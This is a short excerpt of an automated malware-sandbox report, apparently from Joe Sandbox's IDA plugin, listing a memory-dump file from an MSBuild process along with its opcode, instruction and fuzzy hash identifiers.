                                      • Source File: 0000000F.00000002.2512517230.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_6aa0000_MSBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bb24a5bdae042841f5b44476ce5aacaaf6674fff46ef79d04da809dd91bb1a47
                                      • Instruction ID: 0cbbc4375dfda8aa2814d0bf155e294c4eb131b29db489411e735ea82906f2ee
                                      • Opcode Fuzzy Hash: bb24a5bdae042841f5b44476ce5aacaaf6674fff46ef79d04da809dd91bb1a47
                                      • Instruction Fuzzy Hash: 0BA17E32E003098FCF55EFA5C84059EB7F2FF85300B1545AAE915AF221DB35E956CB90